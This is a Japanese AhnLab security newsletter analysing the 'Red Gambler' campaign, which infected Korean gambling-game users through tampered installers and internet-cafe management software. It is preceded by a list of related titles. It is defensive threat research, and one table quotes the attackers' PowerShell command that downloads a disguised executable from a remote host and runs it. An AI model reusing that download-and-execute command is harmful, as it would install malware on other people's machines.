アンラボ発信セキュリティ情報 PressAhn Pick Up! マルウェア詳細分析 相手の手札が丸見え レッドギャンブラー アンラボは韓国主要企業を対象に持続的なサイバー攻撃を実行した多数のハッキンググループを追跡中 ある攻撃グループが国内の不正ギャンブルゲームを通してマルウェアを配布したことが分

Similar documents
Vol.71 政府機関を狙う連続ターゲット攻撃の目的は?

Vol.61 韓国と日本 同時多発的な不正アプリの拡散背景には

Vol.62 コインマイナーが狙う仮想通貨 Top4

Vol.41 ランサムウェア 攻撃ルートの多角化で猛威を振るう

Vol.63 Kimsuky の帰還 今回のターゲットは?

Vol.66 信頼できるマルウェア (?) に隠された真実

Focus In-Depth CyberSecurity Prediction 2018 セキュリティ環境が迎える変化 世界的なリサーチ機関 Frost&Sullivan のアナリストのチャールズ リム (Charles Lim) は2 月 アンラボ本社にて 2018 年サイバーセキュリティ展望 (

FOCUS IN-DEPTH - URSNIF ANALYSIS アースニフ ステガノグラフィーで金融圏を攻撃 金融情報を奪取するマルウェアのアースニフ (Ursnif) が再び活動を再開した アースニフは金融圏で最も頻繁に発見されるマルウェアの一つであり 初期は北米 ヨーロッパ オーストラリアなど

日常生活に密着したセキュリティ脅威の特徴とその事例 生活密着型セキュリティ脅威 Top 年は WannaCryptor や Petya などの強力なランサムウェアが世界で猛威を振るった だがこれらの脅威以外にもけして見過 ごせない生活密着型脅威が続々と出現している 生活密着型脅威その 1

2014 年上半期セキュリティトレンドを振り返る 2014 年もすでに折り返し地点を過ぎ残り数ヶ月となりました 韓国は今年 大手カード会社で起こった大量の顧客情報流出という大事件からスタートし Windows XPサポート終了 Open SSL 脆弱性発見など 様々な問題がセキュリティ業界を緊張させ

Technical Report 年 8 月 31 日 株式会社セキュアソフト 注意喚起 : バンキングトロージャンに感染させるマルウェア付きメール拡散について 1. 概要最近インターネットバンキングなど金融機関関連情報の窃取を目的としたマルウェア付きメールが 日本国内で多数配

2016 年脅威トピック 5 生き残りをかけた適者生存競争 激化 生存競争において環境に適応したものは生き残り そうでないのは淘汰される 一言でまとめたダーウィンの進化論である これは 2016 年セキュリティ脅威の動向にも当てはまる理論であった 今年の脅威はシンプルなものから複雑なものへと進化し

THREAT ANALYSIS MALICIOUS APPS 不正アプリの高度化 最新の手法と対策 最近 韓国ではボイスフィッシングと偽の金融機関アプリを組み合わせた融資詐欺事件が発生した 海外ではアイコンを隠したまま端末にインストールされた悪質なアプリが ユーザーの金融アプリとウーバー (Uber

Vol.15 ハッカーの標的 POS システム

WannaCry とは WannaCry はランサムウェアの一種 WannaCry は ランサムウェアと呼ばれる身代金要求型のマルウェアです WannaCryptor WanaCrypt Wcry といった呼ばれ方もします 一般的にランサムウェアに感染すると 以下のようなデータを使用できないように暗

SQLインジェクション・ワームに関する現状と推奨する対策案

Microsoft PowerPoint - ã…Šã…¬ã…fiㅥㅼ盋_MVISONCloud製åfi†ç´¹ä»‰.pptx

THREAT ANALYSIS IDENTITY THEFT 自動ログインの利便性と そのリスク 最新の統計によると 1 人当たり平均 3つのソーシャルメディアを利用しているという また使用中のメールアカウントも 3つ以上が最も多かった このように複数のアカウントを利用するうえでそれぞれの IDやパ

CONTENTS 2017 年脅威動向 Top 年脅威予測 Top5

第5回 マインクラフト・プログラミング入門

脆弱性を狙った脅威の分析と対策について Vol 年 7 月 21 日独立行政法人情報処理推進機構セキュリティセンター (IPA/ISEC) 独立行政法人情報処理推進機構 ( 略称 IPA 理事長 : 西垣浩司 ) は 2008 年度におけ る脆弱性を狙った脅威の一例を分析し 対策をまと

マルウェアレポート 2018年1月度版

マルウェアレポート 2018年2月度版

マルウェアレポート 2017年9月度版

マルウェアレポート 2018年4月度版

プレゼンテーション

Vol.03 MDS メモリ分析ベースの検知技術を搭載

2015 年 4 月 15 日に発表された HTTP.sys の脆弱性 ( ) へ の対応について 製品名 : バージョン : 対象プラットフォーム : カテゴリ : iautolaymagic すべてすべて Web アプリ この度 マイクロソフト社製品において緊急度の高い脆弱性 (CV

SOC Report

マルウェアレポート 2018年3月度版

Microsoft IISのWebDAV認証回避の脆弱性に関する検証レポート

スライド 1

Vol.04 Partner Step-up Traning Day 2014

便利 vs. 安全のはざまで揺れる 韓国モバイル決済サービス市場の実情とは モバイル決済サービス市場 勝負の行方 ダウムカカオは 9 月にリリースしたモバイル決済サービス カカオ Pay に続き 14の銀行と組んでモバイル送金 決済サービスの バンクウォレットカカオ ( 以下バンカ ) を発表した

延命セキュリティ製品 製品名お客様の想定対象 OS McAfee Embedded Control 特定の業務で利用する物理 PC 仮想 PC や Server 2003 Server 2003 ホワイトリスト型 Trend Micro Safe Lock 特定の業務で利用するスタンドアロン PC

セキュリティプレス アン UNIX Linux OS 関連のBash (Born Again Shell) 脆弱性を詳細分析 Bash 脆弱性 シェルショック で全世界が震撼 2014年9月24日 GNU Bash環境変数を使用したコードインジェクションのセキュリティ脆弱性が報告された これは シェ

なぜIDSIPSは必要なのか?(v1.1).ppt

SiteLock操作マニュアル

JPCERT/CC インターネット定点観測レポート[2014年7月1日~9月30日]

技術レポート 1)QuiX 端末認証と HP IceWall SSO の連携 2)QuiX 端末認証と XenApp の連携 3)QuiX 端末認証 RADIUS オプションと APRESIA の連携 Ver 1.1 Copyright (C) 2012 Base Technology, Inc.

注意 インストール中に ユーザアカウント制御 ( 以下 UAC といいます ) の実行確認画面が表示されることがあります 表示された場合ははいをクリックして インストールを進めてください なお 管理者以外の場合 管理者への昇格を求める UAC 画面が表示される場合がありますので 管理者アカウントのパ

システム利用前の準備作業2.1 準備作業の流れ 準備作業の流れは 以下のとおりです 2必要なものを用意する 2.2 パソコンインターネット接続回線 E メールアドレス 2.2-(1) 2.2-(2) 2.2-(3) 当金庫からの送付物 2.2-(4) パソコンの設定をする 2.3 Cookie の設

スライド 1

金融工学ガイダンス

.1 準備作業の流れ 準備作業の流れは 以下のとおりです 必要なものを用意する. パソコンインターネット接続回線 E メールアドレス.-(1).-().-(3) 当金庫からの送付物.-(4) パソコンの設定をする.3 Cookie の設定を行う.3-(1) Java の設定を有効にする ( ファイル

ネットワーク機器の利用における セキュリティ対策 独立行政法人情報処理推進機構技術本部セキュリティセンター大道晶平

感染条件感染経路タイプウイルス概要 前のバージョン Adobe Reader and Acrobat より前のバージョン Adobe Reader and Acrobat before より前のバージョン Adobe Flash Player before

ACTIVEプロジェクトの取り組み

Ver.0 目次. はじめに.... 証明書の発行 ( ダウンロード ) 手順... 付録 A. ルート証明書無しでの証明書の発行 ( ダウンロード ) 手順... 5 付録 B. ブラウザの設定... Copyright 04 SECOM Trust Systems CO.,LTD. All Ri

f-secure 2006 インストールガイド

2. 留意事項セキュリティ対策を行う場合 次のことに留意してください 不正侵入対策の設定を行う場合 お使いのソフトウェアによっては今までのように正常に動作しなくなる可能性があります 正常に動作しない場合は 必要に応じて例外処理の追加を行ってください ここで行うセキュリティ対策は 通信内容の安全性を高

McAfee Application Control ご紹介

KSforWindowsServerのご紹介

<4D F736F F D D4D D F54696E E82C A DA91B18B40945C82C982E682E9838A B E8

KDDI Smart Mobile Safety Manager Mac OS キッティングマニュアル 最終更新日 2019 年 4 月 25 日 Document ver1.1 (Web サイト ver.9.6.0)

VPNマニュアル

製品概要

iNFUSE インフューズ

情報セキュリティ 10 大脅威 大脅威とは? 2006 年より IPA が毎年発行している資料 10 大脅威選考会 の投票により 情報システムを取巻く脅威を順位付けして解説 Copyright 2017 独立行政法人情報処理推進機構 2

2 章必要なものを用意する パソコン (PC) 推奨環境以下の Windows パソコンのみでのご利用となり スマートフォンやタブレットは推奨環境対象外です なお 携帯電話からはご利用いただけません 最新の利用環境および留意事項につきましては 当金庫までお問い合わせください ( 平成 28 年 1

1.indd

Microsoft Edge の場合 (1) Mizdori 無料体験版ダウンロード画面の [ 体験版ダウンロード ] ボタンをクリックします (2) Edge の下部に mizdori_taiken_setup.zip について行う操作を選んでください と表示され ますので [ 開く ] をクリッ

FENICSⅡ ユニバーサルコネクト スマートフォン・PC接続サービス 設定例(Windows編)第1.0版

1. 開発ツールの概要 1.1 OSS の開発ツール本書では OSS( オープンソースソフトウェア ) の開発ツールを使用します 一般に OSS は営利企業ではない特定のグループが開発するソフトウェアで ソースコードが公開されており無償で使用できます OSS は誰でも開発に参加できますが 大規模な

P.2 もくじ 8. ファイルのアップロードとダウンロード 8-. ファイルのアップロード 8-2. ファイル指定でアップロード 8-3. Zip 解凍アップロード 8-4. ドラッグ & ドロップで一括アップロード 8-5. ファイルのダウンロード 9. ファイルの送信 ( おすすめ機能 ) 9-

PowerPoint プレゼンテーション

< B C815B F898AFA90DD92E8837D836A B E786C73>

PowerPoint プレゼンテーション

本書はクラウド型 Dynamics CRM Online に基づいておりますが 設置型の Dynamics CRM 2013 についてもほぼすべての内容が適用できます 本書は 2013 年 10 月執筆時点での Dynamics CRM Online 製品リリース版に基づ いており 機能強化などによ

マルウェアレポート 2017年12月度版

【EW】かんたんスタートマニュアル

Microsoft PowerPoint - パソコン講習会資料(3)メール ppt

Symantec Endpoint Protection 12.1 の管理練習問題 例題 1. 管理外検出でネットワーク上のシステムを識別するとき 次のどのプロトコルが使用されますか a. ICMP b. TCP c. ARP a. UDP 2. ある管理者が Symantec Endpoint P

スライド 1

FlashAir 設定ソフトウエア株式会社東芝セミコンダクター & ストレージ社 Copyright 2012 TOSHIBA CORPORATION, All Rights Reserved. 対応 OS: Windows XP SP3 / Vista SP2 / 7 (32bit/64bit)

Ver.50 改版履歴 版数 日付 内容 担当 V //9 新規作成 STS V..0 06/6/ 画像修正 STS V..0 06/6/8 画像修正 STS V /9/5 画像追加 (Windows0 Anniversary の記載 ) STS V // 文言修

JAIST Cloud Service利用ガイド

PowerPoint プレゼンテーション

SOC Report

Windows PC VPN ユーザー向け手順書 SoftEther VPN (SSL-VPN) を用いた筑波大学 VPN サービスへの接続方法 学術情報メディアセンター VPN ユーザーマニュアルから Windows PC 向けの情報だけを詳細に説明した設定手順書を作成いたしましたのでご利用くださ

LINE WORKS 管理者トレーニング 4. セキュリティ管理 Ver 年 6 月版

人類の誕生と進化

エンドポイントにおける Web コントロール 概要ガイド

新環境への移行手順書

ヘルスアップWeb 簡単操作ガイド

PowerPoint プレゼンテーション

McAfee Embedded Control データシート

UAC UAC Widows 7 OK Windows8.1/10-9

どこでもキャビネットVer1.3 ご紹介資料

SonicWALL サーバー証明書 2048bit 対応ファームウェア アップデート手順書 TZ180(G4製品)版

インターネットファームバキグ 電子証明書ガイドブック ~証明書取扱手順編~ - 契約会社向け -(対応 OS :Windows 8)

ホスティングA管理画面[Plesk]マニュアル コンテンツアップロード編

Crucial Client SSDでのファームウェアアップデート手順

<90568A838E E7193FC8E AE8DEC8AC28BAB82CC92C789C182C68F9C8A4F82C982C282A282C A8926D82E782B9816A5F8A6D92E894C52E786477>

Microsoft Word - HGWEB_Defender_クリーンアップツール_説明書_Rev.1.00.doc

リリースノート バージョン / /8/04 公開 wivia は 株式会社内 洋 の 本における登録商標です その他の製品名 システム名などは 一般に各社の登録商標または商標です 概要 wivia ファームウェア および Windows/Mac

ご利用になる前に ここでは しんきん電子記録債権システム をご利用になる前に知っておいていただきたいことがらについて説明します 1 ご利用環境と動作条件の確認 2 2 初期設定とは 4 3 ソフトウェアキーボードの使いかた 6

<4D F736F F F696E74202D20838A B E AC888D D836A B81698A7790B691CE899E

中小企業向け サイバーセキュリティ対策の極意

目次 ページ番号 1. アクセス方法 2 2. ログオン方法 2 ~ 3 3. ダウンロード ( 結果データ ) 4 ~ 8 4. ダウンロード ( 計算書等 ) 9 ~ アップロード 14 ~ パスワード変更 20 ~ ポップアップブロックの解除について 23

Transcription:

2018.8 Vol.56 相手の手札が丸見え レッドギャンブラー

アンラボ発信セキュリティ情報 PressAhn Pick Up! マルウェア詳細分析 相手の手札が丸見え レッドギャンブラー アンラボは韓国主要企業を対象に持続的なサイバー攻撃を実行した多数のハッキンググループを追跡中 ある攻撃グループが国内の不正ギャンブルゲームを通してマルウェアを配布したことが分かった レッドギャンブラー (Operation Red Gambler) と呼ばれる同マルウェアは 機密情報の流出などを目的にした以前までの攻撃と異なり 経済的な利益を目的に個人ユーザーまで攻撃を拡大した点で注目する必要がある 今回のプレスアンでは アンラボセキュリティ対応センター ASEC が分析したレッドギャンブラーの攻撃動向を紹介した 2009 年 7 月の DDoS 攻撃を始めとして これまで韓国を対象にしたサイバー攻撃は特定の国家と関連があると推定されるが 関連するハッキンググループは主に政治目的のために攻撃を実行していた 初期はシステム破壊による社会混乱を引き起こして国家機密資料の奪取を目的に攻撃を展開したが 2016 年下半期からは経済的利益を重視した攻撃が目立つようになった 2016 年 10 月から 2017 年 8 月まで約 11ヶ月間にわたって韓国のギャンブルゲームのユーザーを狙った レッドギャンブラー がその代表的な例だ なぜ攻撃範囲を拡大したのだろうか レッドギャンブラーの攻撃対象 レッドギャンブラーは経済的利得のために韓国のギャンブルゲームユーザーを主要ターゲットにした ギャンブルなどの賭博ゲームはユーザーが保有するゲームマネーを賭けて勝敗を分け 稼いだゲームマネーを不正両替屋など多様なルートから現金に変えられる そのため昔から攻撃者らの恰好のターゲットになっていた 韓国に流通するゲームは まず ゲーム類管理委員会の等級分類審査 1 を受けることになるが 一部ギャンブルゲームの場合 一旦 正常 等級を受けてから後でゲーム内容を変更する不正手段を使う 後から変更された内容が取締まりで摘発 登録が取消されれば 一定期間が経過した後で商標を変更してゲーム運営を再開させる このように頻繁に商標が変わる韓国のギャンブルゲーム市場の特性により レッドギャンブラー攻撃グループも周期的に攻撃対象をアップデートしていたことが分かった 1 対象年齢などのレーティングを設定する機関 2

アンラボ発信セキュリティ情報 PressAhn 攻撃タイムライン [図1]は 2016年以降のレッドギャンブラーの攻撃タイムラインだ アンラボが同グループの初回攻撃方法を分析した結果 既存のギャンブルゲーム を狙った典型的な攻撃方法と差があることを確認した [図1] レッドギャンブラーの攻撃タイムライン レッドギャンブラー攻撃グループが製作したマルウェアは 2016年10月最初に発見されたが 当時はユーティリティプログラムを利用する不特定多 数のユーザーを攻撃対象にしていた 同年 12月までもユーティリティプログラムの公式サイトからマルウェアが配布され この攻撃は各ユーティリ ティプログラムタイプによって一定期間進行された また 2017年1月にも攻撃が再開されたが 初回攻撃とは異なり新たな攻撃対象としてネットカフェをターゲットにしたことが確認された 不特定多 数を対象にした以前の攻撃がそれほど効果がなかったからか 小規模の管理サーバーを通じて多数のクライアント制御が可能なネットカフェに目を向 けたものとみられる 同攻撃は 2017年8月まで続いた [図2] 配布時期別マルウェア診断パソコン数 [図2]の配布時期別マルウェア診断パソコン数を見ると攻撃グループが 2017年に攻撃対象をネットカフェに変更したことで マルウェア診断された パソコン数が急増している レッドギャンブラーの攻撃手法 レッドギャンブラーは攻撃を効果的に実行するために ユーティリティソフトウェアのセットアップファイル改ざん ネットカフェ管理プログラ ムのコントロールする方法でマルウェアを配布した 3

アンラボ発信セキュリティ情報 PressAhn 1) ユーティリティソフトウェアのセットアップファイル改ざん ユーティリティソフトウェアを通じる攻撃活動は 2016年10月から発見された 攻撃の震源地はユーティリティソフトウェアの公式サイトと確認さ れ ダウンロード掲示板にアップロードされたセットアップファイルやダウンロードリンクを改ざんする手法を利用した 攻撃グループは VPN サービスを提供するプログラムから リモートコントロールプログラムやシステム最適化プログラムに至るまで多様なユーティ リティソフトウェアを攻撃の踏み台にした このような手法は攻撃が容易なネットカフェをターゲットにした他の攻撃と異なり ユーティリティソフ トウェアを利用する不特定多数のユーザーを狙った点で特徴的だ ターゲットを騙すための手法として マルウェアとセットアップファイルを組み合わせて改ざんファイルを作成し 二つの方法で配布している まず一つ目の方法は 公式サイトの正常ファイルを改ざんファイルにすり替えする方法だ 二つ目は公式サイトのダウンロードリンクアドレスを 改 ざんしたセットアップファイルがアップロードされた攻撃者のサーバーアドレスに改ざんする方法だった 使用者がプログラムをインストールするためにダウンロードリンクアドレスをクリックすると 攻撃者サーバーから改ざんされたファイルがダウンロ ードされる 攻撃グループは公式サイトの管理者とプログラム使用者の疑いを避けるために ダウンロードリンクアドレスを正常なアドレスと類似し た文字列で生成した また単一サーバーに多数のドメイン名を登録する方法でサーバーを運営し ファイルダウンロード以外に他の目的でサーバーに アクセスする場合は公式サイトにリダイレクトするように設定した 2) ネットカフェ管理プログラムから配布 ネットカフェ管理プログラムを通じる攻撃手法は 2017年上半期に確認された 攻撃グループは前述のようにユーティリティソフトウェアを利用する 不特定多数の使用者を対象にした攻撃効果がいまいちだったようで 攻撃対象をネットカフェユーザーに方向転換したと推定される ネットカフェの特性上 少数の管理サーバーから多数のクライアントをコントロールする構造を悪用して 攻撃グループはネットカフェの管理プログ ラムの一部を利用してマルウェアを配布した cmd.exe /c if not exist c:\users\administrator\appdata\local\temp\csrss.exe powershell (new-object system.net.webclient).downloadfile ( http://images.****king.com/flower.gif, c:\users\administrator\appdata\local\temp\csrss.exe ); (new-object -com shell.application).shellexecute( c:\users\administrator\appdata\local\temp\csrss.exe ) [表1] ネットカフェのクライアントに送信されたコマンド 攻撃が発生したネットカフェの配布ルートを分析した結果 ネットカフェのクライアントに[表1]のようなコマンドが実行されたのが確認された 同 コマンドは命令プロンプトを実行して Windows PowerShell を実行する PowerShell はファイルの痕跡を残さないファイルレス(Fileless)攻撃で よく見られるが 別途のファイルを作成せずにスクリプトを動作させると ユーザーに知られないように任意のバスにマルウェアをダウンロード 実 行できる 最初のコマンドを実行したプロセスは見つからなかったが 攻撃グループはネットカフェの管理ソリューションや管理プログラムサーバー に侵入して 事前に製作された悪意ある URL からマルウェアをダウンロードして実行するコマンドを送信したものと推定される メイン攻撃手法 ゲーム情報を流出するためにレッドギャンブラー攻撃に使用されたマルウェアにはメモリーハッキング (Memory Hacking) 攻撃技法が適用されて いた ほとんどのギャンブルゲームがユーザーの個人情報をメモリー領域に保存する点を狙ったのだ ゲームごとにメモリー領域に差があるためハッキングに使われるコード情報は異なるが ハッキングに使用されるコードの共通点はハッキングするメ モリー領域を探り ゲームチャンネルやグループ名 トークルーム名などの情報を C&C サーバーに送信する 実行中のゲーム画面もキャプチャされ てゲーム情報同様に暗号化後 C&Cサーバーに送信された 4

アンラボ発信セキュリティ情報 PressAhn 管理プログラム 相手の画面をリアル タイムに監視 [図3] 管理プログラムとユーザー画面情報の例 送信されたゲーム情報は [図3] のように管理プログラムから監視できるようになる レッドギャンブラー攻撃グループはこれを利用してマルウェア に感染されたシステムの中で実行中のルームに接続 相手のカードを事前に把握し ギャンブル詐欺を行ったと推定される [図4] はゲームごとのメモリーハッキングコード情報だが ゲーム名は異なれどメモリーハッキング過程で使用されるコードが同じであることが分か る これならゲームの商標が変更されてもゲームクライアントに大きい変化はないだろう このように周期的に商標だけ変更して同じようなゲームを 運営するギャンブルゲーム市場の特殊な環境要因によって 攻撃グループは持続的に変種マルウェアを作成及び配布した Aゲーム Bゲーム Cゲーム [図 4] ゲームが異なれど メモリーハッキングコードが一致している 攻撃グループ同士の関連性 2016年10月から2017年8月まで約11ヶ月間進行された攻撃で収集された資料と 韓国の主要サイバー攻撃に対する分析をもとにプロファイルした 結果 今回のレッドギャンブラーもまた同じ攻撃グループが関連していることを確認した これまで韓国で発生した主なサイバー攻撃に使用されたマ ルウェアは 今回利用されたマルウェアと同じ暗号化/復号化コードパターンを見せていたのだ 5

アンラボ発信セキュリティ情報 PressAhn ますます多角化する国内向けサイバー攻撃 特定の国家との関りが疑われるハッキンググループの最新攻撃動向を分析した結果 表向きは情報流出が主目的と見えるが 実際はレッドギャンブラーと同じように奪取した情報を利用して金銭的な収益を上げようとする試みも多数確認された これらの攻撃グループ初期は 主に軍事関連情報を獲得するために攻撃を展開したが 2016 年末を境に オンラインゲームユーザー 仮想通貨取引所利用者 旅行会社など攻撃対象を順次拡大しつつある 特にレッドギャンブラー攻撃ケースの場合 韓国ユーザーが主に利用するユーティリティソフトウェアの脆弱性を利用した点やネットカフェなどをターゲットに攻撃を遂行した点を見ると 同攻撃は現在韓国の IT 事情に精通している者が関与していると見られる 多数の個人ユーザーまで攻撃対象が拡がっている中で 攻撃グループは今後とも経済的利益のためにさらに高度 多角化された攻撃を展開するだろう このような変化にしっかりと対応するために個々人のさらなる注意が求められている レッドギャンブラーに関するより詳細な情報は 次の URL にリンクされた ASEC レポート ( 英語版 ) VOL.91 から確認できる https://global.ahnlab.com/global/upload/download/asecreport/asec%20report_vol.91_eng.pdf 6

http://jp.ahnlab.com/site/main.do http://global.ahnlab.com/site/main.do http://www.ahnlab.com/kr/site/main.do アンラボとは株式会社アンラボは 業界をリードする情報セキュリティソリューションの開発会社です 1995 年から弊社では情報セキュリティ分野におけるイノベーターとして最先端技術と高品質のサービスをご提供できるように努力を傾けてまいりました 今後もお客様のビジネス継続性をお守りし 安心できるIT 環境づくりに貢献しながらセキュリティ業界の先駆者になれるよう邁進してまいります アンラボはデスクトップおよびサーバー 携帯電話 オンライントランザクション ネットワークアプライアンスなど多岐にわたる総合セキュリティ製品のラインナップを揃えております どの製品も世界トップクラスのセキュリティレベルを誇り グローバル向けコンサルタントサービスを含む包括的なセキュリティサービスをお届け致します 108-0014 東京都港区芝 4 丁目 13-2 田町フロントビル 3 階 TEL: 03-6453-8315 ( 代 ) 2018 AhnLab, Inc. All rights reserved.